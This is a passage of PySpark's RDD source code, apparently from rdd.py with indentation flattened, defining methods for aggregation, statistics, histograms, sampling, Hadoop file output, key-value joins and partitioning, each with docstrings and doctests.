[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
@ignore_unicode_prefix
def pipe(self, command, env=None, checkCode=False):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
:param checkCode: whether or not to check the return value of the shell command.
"""
if env is None:
env = dict()
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = str(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code():
pipe.wait()
if checkCode and pipe.returncode:
raise Exception("Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode))
else:
for i in range(0):
yield i
return (x.rstrip(b'\n').decode('utf-8') for x in
chain(iter(pipe.stdout.readline, b''), check_return_code()))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
f = fail_on_stopiteration(f)
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
"""
with SCCallSiteSync(self.context) as css:
sock_info = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(sock_info, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
f = fail_on_stopiteration(f)
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
op = fail_on_stopiteration(op)
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
an U and one operation for merging two U
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
seqOp = fail_on_stopiteration(seqOp)
combOp = fail_on_stopiteration(combOp)
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
and 50 we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
this can be switched from an O(log n) inseration to O(1) per
element (where n is the number of buckets).
Buckets must be sorted, not contain any duplicates, and have
at least two elements.
If `buckets` is a number, it will generate buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given `buckets`
as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
be at least 1. An exception is raised if the RDD contains infinity.
If the elements in the RDD do not vary (max == min), a single bucket
will be used.
The return value is a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from an RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
.. note:: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from an RDD ordered in ascending order or as
specified by the optional key function.
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and use the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first paramter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all.
.. note:: an RDD may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
@param path: path to text file
@param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
.. note:: this method should only be used if the resulting data is expected
to be small, as all the data is loaded into the driver's memory.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative and commutative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
Default partitioner is hash-partition.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative and commutative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
func = fail_on_stopiteration(func)
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
